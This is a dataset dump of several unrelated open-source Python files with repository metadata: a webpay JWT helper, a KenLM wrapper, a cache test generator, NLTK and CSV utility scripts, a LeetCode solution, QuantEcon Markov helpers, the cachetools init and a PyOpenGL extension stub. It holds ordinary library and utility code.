b6bac8756d9b92c61f392defe060acf7353cfe9f | 1,374 | py | Python | lib/crypto/webpay.py | oremj/zamboni | a751dc6d22f7af947da327b0a091cbab0a999f49 | [
"BSD-3-Clause"
] | null | null | null | lib/crypto/webpay.py | oremj/zamboni | a751dc6d22f7af947da327b0a091cbab0a999f49 | [
"BSD-3-Clause"
] | null | null | null | lib/crypto/webpay.py | oremj/zamboni | a751dc6d22f7af947da327b0a091cbab0a999f49 | [
"BSD-3-Clause"
] | null | null | null | import hashlib
import uuid
from django.conf import settings
import commonware.log
from moz_inapp_pay.verify import verify_claims, verify_keys
import jwt
log = commonware.log.getLogger('z.crypto')
secret = settings.APP_PURCHASE_SECRET
class InvalidSender(Exception):
pass
def get_uuid():
return 'webpay:%s' % hashlib.md5(str(uuid.uuid4())).hexdigest()
def verify_webpay_jwt(signed_jwt):
# This can probably be deleted depending upon solitude.
try:
jwt.decode(signed_jwt.encode('ascii'), secret)
except Exception, e:
log.error('Error decoding webpay jwt: %s' % e, exc_info=True)
return {'valid': False}
return {'valid': True}
def sign_webpay_jwt(data):
return jwt.encode(data, secret)
def parse_from_webpay(signed_jwt, ip):
try:
data = jwt.decode(signed_jwt.encode('ascii'), secret)
except Exception, e:
log.info('Received invalid webpay postback from IP %s: %s' %
(ip or '(unknown)', e), exc_info=True)
raise InvalidSender()
verify_claims(data)
iss, aud, product_data, trans_id = verify_keys(
data,
('iss', 'aud', 'request.productData', 'response.transactionID'))
log.info('Received webpay postback JWT: iss:%s aud:%s '
'trans_id:%s product_data:%s'
% (iss, aud, trans_id, product_data))
return data
| 25.444444 | 72 | 0.664483 | 183 | 1,374 | 4.84153 | 0.415301 | 0.040632 | 0.03386 | 0.040632 | 0.121896 | 0.121896 | 0.121896 | 0.121896 | 0.121896 | 0.121896 | 0 | 0.001859 | 0.216885 | 1,374 | 53 | 73 | 25.924528 | 0.821561 | 0.038574 | 0 | 0.111111 | 0 | 0 | 0.181956 | 0.016679 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.027778 | 0.166667 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
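The `get_uuid()` helper above builds a namespaced transaction id by hashing a random UUID. The file is Python 2-era code; a Python 3 rendering of the same construction (the `.encode()` call is the only assumed change) looks like this:

```python
import hashlib
import uuid

def get_uuid(prefix="webpay"):
    # same construction as get_uuid() above: md5 hex digest of a
    # random UUID, namespaced with a short prefix
    digest = hashlib.md5(str(uuid.uuid4()).encode("ascii")).hexdigest()
    return "%s:%s" % (prefix, digest)

token = get_uuid()
print(token)
```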
b6bfdebde7d1a6fa2a649af7388ae0caea348982 | 5,944 | py | Python | nematus/lm.py | thompsonb/DL4MT | 31da3b5105368c270a4f9ea66b7d134b964082bf | [
"BSD-3-Clause"
] | 22 | 2017-09-29T09:43:59.000Z | 2021-03-31T03:57:52.000Z | nematus/lm.py | thompsonb/DL4MT | 31da3b5105368c270a4f9ea66b7d134b964082bf | [
"BSD-3-Clause"
] | 3 | 2018-04-15T12:57:18.000Z | 2020-02-25T12:43:21.000Z | nematus/lm.py | thompsonb/DL4MT | 31da3b5105368c270a4f9ea66b7d134b964082bf | [
"BSD-3-Clause"
] | 13 | 2017-07-18T03:45:52.000Z | 2019-10-09T05:16:02.000Z | import kenlm
import os
import pickle
import tempfile
import zipfile
from config import KENLM_PATH
from pyro_utils import BGProc
from config import PORT_NUMBER, TEMP_DIR
import time
import subprocess
import shlex
def _unzip_to_tempdir(model_zip_path):
# temp folder (automatically deleted on exit)
tmpdir = tempfile.mkdtemp(dir=TEMP_DIR)
# unzip model into tempdir
with zipfile.ZipFile(model_zip_path, 'r', allowZip64=True) as zip_ref:
zip_ref.extractall(tmpdir)
return tmpdir
def _zip_to_model(tmpdir, model_zip_path):
# make pickle file with model options
# create zipfile archive
zf = zipfile.ZipFile(model_zip_path, 'w', allowZip64=True)
zf.compress_type = zipfile.ZIP_DEFLATED # saw a note that this helps with backwards compat
# Adding files from directory 'files'
for _, _, files in os.walk(tmpdir):
for f in files:
zf.write(os.path.join(tmpdir, f), f)
class AbstractLM(object):
def train(self, path_to_text):
raise NotImplementedError()
def save(self, model_file_name):
raise NotImplementedError()
def load(self, model_file_name):
raise NotImplementedError()
def score(self, sentences):
raise NotImplementedError()
def _assert_initilized(self):
if not hasattr(self, 'tmpdir'):
raise Exception('Did you forget to run train or load first?')
class DummyLM(AbstractLM):
def train(self, path_to_text):
pass
def save(self, model_file_name):
self.tmpdir = tempfile.mkdtemp(dir=TEMP_DIR)
params = dict(model_type='dummy')
pkl_fname = os.path.join(self.tmpdir, 'params.pkl')
with open(pkl_fname, 'w') as fileObject:
pickle.dump(params, fileObject)
_zip_to_model(self.tmpdir, model_file_name)
def load(self, model_file_name):
pass
def score(self, sentences):
return [-42.0 for _ in sentences]
class KenLM(AbstractLM):
"""
implements simple wrapper around kenlm
model is saved as kenlm_model.binary in zip file
model_type is "kenlm"
"""
def wrap_existing_kenlm_model(self, kenlm_model):
if not (kenlm_model.endswith('.binary') or '.binlm' in kenlm_model):
raise Exception('expected file with .binlm* or .binary extension')
self.tmpdir = tempfile.mkdtemp(dir=TEMP_DIR)
model_binary_path = os.path.join(self.tmpdir, 'kenlm_model.binary')
subprocess.check_call('cp %s %s'%(kenlm_model, model_binary_path), shell=True)
self.kenlm_model = kenlm.Model(model_binary_path)
def train(self, path_to_text):
# also stores binary in temp directory
self.tmpdir = tempfile.mkdtemp(dir=TEMP_DIR)
model_arpa_path = os.path.join(self.tmpdir, 'kenlm_model.arpa')
model_binary_path = os.path.join(self.tmpdir, 'kenlm_model.binary')
myinput = open(path_to_text)
myoutput = open(model_arpa_path, 'w')
args = shlex.split(os.path.join(KENLM_PATH, 'bin/lmplz') + ' -o 5 -S 40% --skip_symbols </s> <unk>')
# from kenlm exception: --skip_symbols: to avoid this exception:
# Special word </s> is not allowed in the corpus. I plan to support models containing <unk> in the future.
# Pass --skip_symbols to convert these symbols to whitespace.
p = subprocess.Popen(args, stdin=myinput, stdout=myoutput)
p.wait()
        # convert arpa to binary
        p = subprocess.Popen(shlex.split('%s %s %s' % (os.path.join(KENLM_PATH, 'bin/build_binary'), model_arpa_path, model_binary_path)))
        p.wait()
        # remove arpa file
        p = subprocess.Popen(shlex.split('rm %s' % model_arpa_path))
        p.wait()
#lm_bin = os.path.join(KENLM_PATH, 'bin/lmplz')
#binarize_bin = os.path.join(KENLM_PATH, 'bin/build_binary')
#subprocess.check_call('%s -o 5 -S 40%% > %s' % (lm_bin, model_arpa_path))
#subprocess.check_call('%s %s %s' % (binarize_bin, model_arpa_path, model_binary_path))
#subprocess.check_call('rm %s' % model_arpa_path)
self.kenlm_model = kenlm.Model(model_binary_path)
def save(self, model_file_name):
"""
save trained model to disk
TODO (nice to have): write anything that seems useful (training parameters, date trained, etc) to params.pkl
"""
if not model_file_name.endswith('.zip'):
raise Exception('expected output file to have .zip extension')
self._assert_initilized()
params = dict(model_type='kenlm')
pkl_fname = os.path.join(self.tmpdir, 'params.pkl')
with open(pkl_fname, 'w') as fileObject:
pickle.dump(params, fileObject)
_zip_to_model(self.tmpdir, model_file_name)
def load(self, model_file_name):
self.tmpdir = _unzip_to_tempdir(model_file_name)
self.kenlm_model = kenlm.Model(os.path.join(self.tmpdir, 'kenlm_model.binary'))
def score(self, sentences):
self._assert_initilized()
return [self.kenlm_model.score(sent, bos=True, eos=True) for sent in sentences]
def lm_factory(model_file_name):
"""
Peek inside model and see which language model class should open it,
and return an instantiation of that class, with said model loaded
:param model_file_name: NematusLL language model file (zip containing params.pkl, etc)
:return: instantiated language model class (implements AbstractLM interface)
"""
print 'creating class map'
class_map = dict(kenlm=KenLM,
dummy=DummyLM)
print 'loading pickle file'
with zipfile.ZipFile(model_file_name, 'r') as zf:
with zf.open('params.pkl') as fh:
params = pickle.load(fh)
print 'setting model type'
model_type = params['model_type']
LM_Class = class_map[model_type]
lm = LM_Class()
print 'loading model file'
lm.load(model_file_name)
return lm
| 33.206704 | 138 | 0.669751 | 818 | 5,944 | 4.676039 | 0.248166 | 0.047059 | 0.047582 | 0.026667 | 0.334379 | 0.286013 | 0.229542 | 0.181699 | 0.126536 | 0.104575 | 0 | 0.002836 | 0.228802 | 5,944 | 178 | 139 | 33.393258 | 0.831588 | 0.1393 | 0 | 0.38 | 0 | 0 | 0.098009 | 0 | 0 | 0 | 0 | 0.005618 | 0.03 | 0 | null | null | 0.02 | 0.11 | null | null | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
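The model format used throughout `lm.py` is a zip archive carrying a `params.pkl` whose `model_type` key tells `lm_factory` which class to instantiate — note that the factory peeks at the pickle with `zf.open` without extracting the archive. A minimal Python 3 sketch of that round trip (binary pickle modes are an assumed modernization of the Python 2 original):

```python
import os
import pickle
import tempfile
import zipfile

def save_params(model_zip_path, params):
    """Write params.pkl into a model zip, mirroring _zip_to_model/save()."""
    tmpdir = tempfile.mkdtemp()
    pkl_fname = os.path.join(tmpdir, "params.pkl")
    with open(pkl_fname, "wb") as fh:
        pickle.dump(params, fh)
    with zipfile.ZipFile(model_zip_path, "w", allowZip64=True) as zf:
        zf.write(pkl_fname, "params.pkl")

def peek_model_type(model_zip_path):
    """Mirror of lm_factory's peek: read model_type without extracting."""
    with zipfile.ZipFile(model_zip_path, "r") as zf:
        with zf.open("params.pkl") as fh:
            return pickle.load(fh)["model_type"]

path = os.path.join(tempfile.mkdtemp(), "model.zip")
save_params(path, dict(model_type="dummy"))
print(peek_model_type(path))
```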
b6ca139a678c7000c7bdb0593d9843845014384f | 712 | py | Python | pythondata_cpu_blackparrot/system_verilog/black-parrot/external/basejump_stl/testing/bsg_cache/regression_non_blocking/test_block_ld.py | litex-hub/pythondata-cpu-blackparrot | ba50883f12d33e1d834640640c84ddc9329bb68a | [
"BSD-3-Clause"
] | 3 | 2021-05-12T21:57:55.000Z | 2021-07-29T19:56:04.000Z | pythondata_cpu_blackparrot/system_verilog/black-parrot/external/basejump_stl/testing/bsg_cache/regression_non_blocking/test_block_ld.py | litex-hub/litex-data-cpu-blackparrot | ba50883f12d33e1d834640640c84ddc9329bb68a | [
"BSD-3-Clause"
] | 2 | 2020-05-13T06:06:49.000Z | 2020-05-15T10:49:11.000Z | pythondata_cpu_blackparrot/system_verilog/black-parrot/external/basejump_stl/testing/bsg_cache/regression_non_blocking/test_block_ld.py | litex-hub/litex-data-cpu-blackparrot | ba50883f12d33e1d834640640c84ddc9329bb68a | [
"BSD-3-Clause"
] | 2 | 2020-05-01T08:33:19.000Z | 2021-07-29T19:56:12.000Z | import sys
import random
from test_base import *
class TestBlockLD(TestBase):
    def generate(self):
        self.clear_tag()

        for n in range(50000):
            store_not_load = random.randint(0, 1)
            tag = random.randint(0, 15)
            index = random.randint(0, self.sets_p - 1)
            taddr = self.get_addr(tag, index)
            if store_not_load:
                self.send_block_st(taddr)
            else:
                self.send_block_ld(taddr)

        self.tg.done()

    def send_block_st(self, addr):
        base_addr = addr - (addr % (self.block_size_in_words_p * 4))
        for i in range(self.block_size_in_words_p):
            self.send_sw(base_addr + (i * 4))

# main()
if __name__ == "__main__":
    t = TestBlockLD()
    t.generate()
| 19.777778 | 62 | 0.636236 | 108 | 712 | 3.888889 | 0.444444 | 0.092857 | 0.1 | 0.071429 | 0.1 | 0.1 | 0 | 0 | 0 | 0 | 0 | 0.026022 | 0.244382 | 712 | 35 | 63 | 20.342857 | 0.754647 | 0.008427 | 0 | 0 | 1 | 0 | 0.011396 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0 | 0.130435 | 0 | 0.26087 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
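`send_block_st` first aligns the address down to the base of its cache block (`block_size_in_words_p` words of 4 bytes each) and then stores every word in that block. The alignment arithmetic in isolation:

```python
def block_word_addrs(addr, block_size_in_words_p):
    # Align down to the block boundary, then enumerate each 4-byte word address.
    base_addr = addr - (addr % (block_size_in_words_p * 4))
    return [base_addr + i * 4 for i in range(block_size_in_words_p)]

# For an 8-word (32-byte) block, address 0x46 falls in the block starting at 0x40.
addrs = block_word_addrs(0x46, 8)
print([hex(a) for a in addrs])
# → ['0x40', '0x44', '0x48', '0x4c', '0x50', '0x54', '0x58', '0x5c']
```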
b6cac04d860710d1f200c5fdfd368545e66917d9 | 318 | py | Python | easytoken/blob.py | sayanmondal2098/tokenizer | 145f9ac5404583270fc90bfcc94c586d3b3931f2 | [
"MIT"
] | 3 | 2020-01-17T09:11:13.000Z | 2020-07-29T09:44:43.000Z | easytoken/blob.py | sayanmondal2098/tokenizer | 145f9ac5404583270fc90bfcc94c586d3b3931f2 | [
"MIT"
] | 1 | 2019-12-29T08:39:47.000Z | 2019-12-29T08:39:47.000Z | easytoken/blob.py | sayanmondal2098/tokenizer | 145f9ac5404583270fc90bfcc94c586d3b3931f2 | [
"MIT"
] | 4 | 2019-12-28T20:59:08.000Z | 2020-01-10T11:50:04.000Z | import sys
import json
import nltk
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize, sent_tokenize

class Partsofspeech():

    def pos(txt):
        tokens = nltk.word_tokenize(txt)
        return nltk.pos_tag(tokens)
# stop_words = set(stopwords.words('english')) | 19.875 | 55 | 0.710692 | 42 | 318 | 5.261905 | 0.52381 | 0.090498 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.204403 | 318 | 16 | 56 | 19.875 | 0.873518 | 0.138365 | 0 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.6 | 0 | 0.9 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
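`Partsofspeech.pos` depends on NLTK's tokenizer and POS tagger. Where NLTK (and its data downloads) are unavailable, a crude stdlib approximation of just the tokenization step looks like this (the tagging step has no stdlib equivalent):

```python
import re

def word_tokenize(txt):
    # Split into word tokens and single punctuation tokens;
    # a rough stand-in for nltk.word_tokenize, not a faithful replacement.
    return re.findall(r"\w+|[^\w\s]", txt)

print(word_tokenize("Hello, world!"))  # → ['Hello', ',', 'world', '!']
```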
b6dc2d5c6b37c06411e4b2b686ddf633947cd5e9 | 409 | py | Python | db/folderName_to_CSV.py | JontyBurden/local-movies | f7df5156244d3b48ff5d5d906a84778a041e8e6a | [
"MIT"
] | null | null | null | db/folderName_to_CSV.py | JontyBurden/local-movies | f7df5156244d3b48ff5d5d906a84778a041e8e6a | [
"MIT"
] | null | null | null | db/folderName_to_CSV.py | JontyBurden/local-movies | f7df5156244d3b48ff5d5d906a84778a041e8e6a | [
"MIT"
] | null | null | null | import os, csv
path = r'F:\Movies-TV'

with open(r'C:\wsl\local-movies\db\movies.csv', 'w', newline='') as csvfile:
    writer = csv.writer(csvfile)
    for root, dirs, files in os.walk(path):
        for folders in dirs:
            if folders == "Subs" or folders == "Subtitles" or folders == "Other" or folders == "subtitles":
                pass
            else:
                writer.writerow([folders.replace('.', ' ')]) | 34.083333 | 105 | 0.586797 | 54 | 409 | 4.444444 | 0.62963 | 0.1125 | 0.15 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.244499 | 409 | 12 | 106 | 34.083333 | 0.776699 | 0 | 0 | 0 | 0 | 0 | 0.182927 | 0.080488 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.1 | 0.1 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
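The walk-and-filter logic can be exercised end to end against a temporary directory; the directory names below are illustrative, not the script's actual `F:` drive contents:

```python
import csv
import os
import tempfile

SKIP = {"Subs", "Subtitles", "Other", "subtitles"}

with tempfile.TemporaryDirectory() as root:
    for name in ("Alien.1979", "Blade.Runner", "Subs"):
        os.mkdir(os.path.join(root, name))

    out_path = os.path.join(root, "movies.csv")
    with open(out_path, "w", newline="") as csvfile:
        writer = csv.writer(csvfile)
        for _, dirs, _ in os.walk(root):
            for folder in dirs:
                if folder not in SKIP:
                    # Dots in folder names become spaces, as in the original.
                    writer.writerow([folder.replace(".", " ")])

    with open(out_path, newline="") as f:
        rows = sorted(row[0] for row in csv.reader(f))

print(rows)  # → ['Alien 1979', 'Blade Runner']
```

A set membership test replaces the chained `==` comparisons; the filtering behaviour is the same.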
b6df00a62451dc167e6c6ea51fe423abf1e88505 | 400 | py | Python | Two pointers/26. Remove Duplicates from Sorted Array.py | ParisMineur/LeetCode-note | c780b66674b27a6a3ed35f522ab93202791e9da8 | [
"MIT"
] | null | null | null | Two pointers/26. Remove Duplicates from Sorted Array.py | ParisMineur/LeetCode-note | c780b66674b27a6a3ed35f522ab93202791e9da8 | [
"MIT"
] | null | null | null | Two pointers/26. Remove Duplicates from Sorted Array.py | ParisMineur/LeetCode-note | c780b66674b27a6a3ed35f522ab93202791e9da8 | [
"MIT"
] | null | null | null | from typing import List

class Solution:
    def removeDuplicates(self, nums: List[int]) -> int:
        l = len(nums)
        if l == 1:
            return 1
        index = 1
        num = nums[0]
        for i in range(1, l):
            if nums[i] == num:
                continue
            num = nums[i]
            nums[index] = nums[i]
            index += 1
        return index
| 21.052632 | 55 | 0.3825 | 44 | 400 | 3.477273 | 0.477273 | 0.098039 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03125 | 0.52 | 400 | 18 | 56 | 22.222222 | 0.765625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
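The two-pointer compaction returns the new length `k`, and callers read only `nums[:k]`. A lightly restructured but equivalent version with a usage check:

```python
from typing import List

class Solution:
    def removeDuplicates(self, nums: List[int]) -> int:
        # Two pointers: i scans, index marks the next write slot.
        if not nums:
            return 0
        index = 1
        for i in range(1, len(nums)):
            if nums[i] != nums[index - 1]:
                nums[index] = nums[i]
                index += 1
        return index

nums = [0, 0, 1, 1, 1, 2, 2, 3, 3, 4]
k = Solution().removeDuplicates(nums)
print(k, nums[:k])  # → 5 [0, 1, 2, 3, 4]
```

Comparing against `nums[index - 1]` instead of a separate `num` tracker also makes the empty-list case trivial to handle.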
b6e53ea6a72678a21b9d2e3336270225aa772e0f | 3,553 | py | Python | quantecon/markov/utilities.py | Smit-create/QuantEcon.py | 5be42da065c198e84a468d5e0e38056168a6b0e3 | [
"BSD-3-Clause"
] | 1,462 | 2015-01-08T18:58:13.000Z | 2022-03-29T05:24:28.000Z | quantecon/markov/utilities.py | Smit-create/QuantEcon.py | 5be42da065c198e84a468d5e0e38056168a6b0e3 | [
"BSD-3-Clause"
] | 505 | 2015-01-06T08:52:16.000Z | 2022-03-31T13:52:58.000Z | quantecon/markov/utilities.py | Smit-create/QuantEcon.py | 5be42da065c198e84a468d5e0e38056168a6b0e3 | [
"BSD-3-Clause"
] | 1,987 | 2015-01-08T06:08:39.000Z | 2022-03-29T08:02:45.000Z | """
Utility routines for the markov submodule

"""
import numpy as np
from numba import jit


@jit(nopython=True, cache=True)
def sa_indices(num_states, num_actions):
    """
    Generate `s_indices` and `a_indices` for `DiscreteDP`, for the case
    where all the actions are feasible at every state.

    Parameters
    ----------
    num_states : scalar(int)
        Number of states.

    num_actions : scalar(int)
        Number of actions.

    Returns
    -------
    s_indices : ndarray(int, ndim=1)
        Array containing the state indices.

    a_indices : ndarray(int, ndim=1)
        Array containing the action indices.

    Examples
    --------
    >>> s_indices, a_indices = qe.markov.sa_indices(4, 3)
    >>> s_indices
    array([0, 0, 0, 1, 1, 1, 2, 2, 2, 3, 3, 3])
    >>> a_indices
    array([0, 1, 2, 0, 1, 2, 0, 1, 2, 0, 1, 2])

    """
    L = num_states * num_actions
    dtype = np.int_
    s_indices = np.empty(L, dtype=dtype)
    a_indices = np.empty(L, dtype=dtype)

    i = 0
    for s in range(num_states):
        for a in range(num_actions):
            s_indices[i] = s
            a_indices[i] = a
            i += 1

    return s_indices, a_indices


@jit(nopython=True, cache=True)
def _fill_dense_Q(s_indices, a_indices, Q_in, Q_out):
    L = Q_in.shape[0]
    for i in range(L):
        Q_out[s_indices[i], a_indices[i], :] = Q_in[i, :]
    return Q_out


@jit(nopython=True, cache=True)
def _s_wise_max_argmax(a_indices, a_indptr, vals, out_max, out_argmax):
    n = len(out_max)
    for i in range(n):
        if a_indptr[i] != a_indptr[i+1]:
            m = a_indptr[i]
            for j in range(a_indptr[i]+1, a_indptr[i+1]):
                if vals[j] > vals[m]:
                    m = j
            out_max[i] = vals[m]
            out_argmax[i] = a_indices[m]


@jit(nopython=True, cache=True)
def _s_wise_max(a_indices, a_indptr, vals, out_max):
    n = len(out_max)
    for i in range(n):
        if a_indptr[i] != a_indptr[i+1]:
            m = a_indptr[i]
            for j in range(a_indptr[i]+1, a_indptr[i+1]):
                if vals[j] > vals[m]:
                    m = j
            out_max[i] = vals[m]


@jit(nopython=True, cache=True)
def _find_indices(a_indices, a_indptr, sigma, out):
    n = len(sigma)
    for i in range(n):
        for j in range(a_indptr[i], a_indptr[i+1]):
            if sigma[i] == a_indices[j]:
                out[i] = j


@jit(nopython=True, cache=True)
def _has_sorted_sa_indices(s_indices, a_indices):
    """
    Check whether `s_indices` and `a_indices` are sorted in
    lexicographic order.

    Parameters
    ----------
    s_indices, a_indices : ndarray(ndim=1)

    Returns
    -------
    bool
        Whether `s_indices` and `a_indices` are sorted.

    """
    L = len(s_indices)
    for i in range(L-1):
        if s_indices[i] > s_indices[i+1]:
            return False
        if s_indices[i] == s_indices[i+1]:
            if a_indices[i] >= a_indices[i+1]:
                return False
    return True


@jit(nopython=True, cache=True)
def _generate_a_indptr(num_states, s_indices, out):
    """
    Generate `a_indptr`; stored in `out`. `s_indices` is assumed to be
    in sorted order.

    Parameters
    ----------
    num_states : scalar(int)

    s_indices : ndarray(int, ndim=1)

    out : ndarray(int, ndim=1)
        Length must be num_states+1.

    """
    idx = 0
    out[0] = 0
    for s in range(num_states-1):
        while(s_indices[idx] == s):
            idx += 1
        out[s+1] = idx
    out[num_states] = len(s_indices)
| 24.170068 | 71 | 0.565438 | 554 | 3,553 | 3.431408 | 0.169675 | 0.096791 | 0.0505 | 0.073645 | 0.517622 | 0.428196 | 0.332457 | 0.254603 | 0.153603 | 0.110468 | 0 | 0.020842 | 0.297777 | 3,553 | 146 | 72 | 24.335616 | 0.741082 | 0.30228 | 0 | 0.382353 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.102941 | false | 0 | 0.029412 | 0 | 0.205882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
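`sa_indices` enumerates state–action pairs in row-major order: all actions of state 0, then all actions of state 1, and so on. A pure-Python equivalent, without the NumPy/Numba dependency, reproduces the docstring example and makes the layout explicit:

```python
def sa_indices_py(num_states, num_actions):
    # Row-major enumeration of (state, action) pairs.
    pairs = [(s, a) for s in range(num_states) for a in range(num_actions)]
    s_indices = [s for s, _ in pairs]
    a_indices = [a for _, a in pairs]
    return s_indices, a_indices

s_idx, a_idx = sa_indices_py(4, 3)
print(s_idx)  # → [0, 0, 0, 1, 1, 1, 2, 2, 2, 3, 3, 3]
print(a_idx)  # → [0, 1, 2, 0, 1, 2, 0, 1, 2, 0, 1, 2]
```

Pair `i` corresponds to state `i // num_actions` and action `i % num_actions`, which is why `_fill_dense_Q` can scatter row `i` of a flat `Q_in` into `Q_out[s, a, :]`.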
b6e579bdd514a20d1c5d2a97e578f7ccc82ca41c | 395 | py | Python | GmailWrapper_JE/venv/Lib/site-packages/cachetools/__init__.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | GmailWrapper_JE/venv/Lib/site-packages/cachetools/__init__.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | GmailWrapper_JE/venv/Lib/site-packages/cachetools/__init__.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | """Extensible memoizing collections and decorators."""
from .cache import Cache
from .decorators import cached, cachedmethod
from .lfu import LFUCache
from .lru import LRUCache
from .rr import RRCache
from .ttl import TTLCache
__all__ = (
    'Cache',
    'LFUCache',
    'LRUCache',
    'RRCache',
    'TTLCache',
    'cached',
    'cachedmethod'
)
__version__ = '4.1.1'
| 18.809524 | 55 | 0.653165 | 42 | 395 | 5.952381 | 0.52381 | 0.144 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01 | 0.240506 | 395 | 20 | 56 | 19.75 | 0.823333 | 0.121519 | 0 | 0 | 0 | 0 | 0.183801 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
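The exported cache classes back cachetools' `cached`/`cachedmethod` memoizing decorators. With only the standard library, `functools.lru_cache` illustrates the same memoization idea, though it fixes the eviction policy to LRU where cachetools lets you swap in LFU, RR, or TTL caches:

```python
import functools

calls = 0

@functools.lru_cache(maxsize=128)
def fib(n):
    # Count real invocations to show memoization at work.
    global calls
    calls += 1
    return n if n < 2 else fib(n - 1) + fib(n - 2)

print(fib(20), calls)  # → 6765 21
```

Without the cache, the naive recursion would make thousands of calls; memoized, each `n` from 0 to 20 is computed exactly once.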
b6eaf6148ff2d5db7a379220d276e7ab7879f08c | 1,077 | py | Python | PyOpenGL-3.0.2/OpenGL/raw/GL/INGR/color_clamp.py | frederica07/Dragon_Programming_Process | c0dff2e20c1be6db5adc6f9977efae8f7f888ef5 | [
"BSD-2-Clause"
] | null | null | null | PyOpenGL-3.0.2/OpenGL/raw/GL/INGR/color_clamp.py | frederica07/Dragon_Programming_Process | c0dff2e20c1be6db5adc6f9977efae8f7f888ef5 | [
"BSD-2-Clause"
] | null | null | null | PyOpenGL-3.0.2/OpenGL/raw/GL/INGR/color_clamp.py | frederica07/Dragon_Programming_Process | c0dff2e20c1be6db5adc6f9977efae8f7f888ef5 | [
"BSD-2-Clause"
] | null | null | null | '''Autogenerated by get_gl_extensions script, do not edit!'''
from OpenGL import platform as _p
from OpenGL.GL import glget
EXTENSION_NAME = 'GL_INGR_color_clamp'
_p.unpack_constants( """GL_RED_MIN_CLAMP_INGR 0x8560
GL_GREEN_MIN_CLAMP_INGR 0x8561
GL_BLUE_MIN_CLAMP_INGR 0x8562
GL_ALPHA_MIN_CLAMP_INGR 0x8563
GL_RED_MAX_CLAMP_INGR 0x8564
GL_GREEN_MAX_CLAMP_INGR 0x8565
GL_BLUE_MAX_CLAMP_INGR 0x8566
GL_ALPHA_MAX_CLAMP_INGR 0x8567""", globals())
glget.addGLGetConstant( GL_RED_MIN_CLAMP_INGR, (1,) )
glget.addGLGetConstant( GL_GREEN_MIN_CLAMP_INGR, (1,) )
glget.addGLGetConstant( GL_BLUE_MIN_CLAMP_INGR, (1,) )
glget.addGLGetConstant( GL_ALPHA_MIN_CLAMP_INGR, (1,) )
glget.addGLGetConstant( GL_RED_MAX_CLAMP_INGR, (1,) )
glget.addGLGetConstant( GL_GREEN_MAX_CLAMP_INGR, (1,) )
glget.addGLGetConstant( GL_BLUE_MAX_CLAMP_INGR, (1,) )
glget.addGLGetConstant( GL_ALPHA_MAX_CLAMP_INGR, (1,) )
def glInitColorClampINGR():
    '''Return boolean indicating whether this extension is available'''
    from OpenGL import extensions
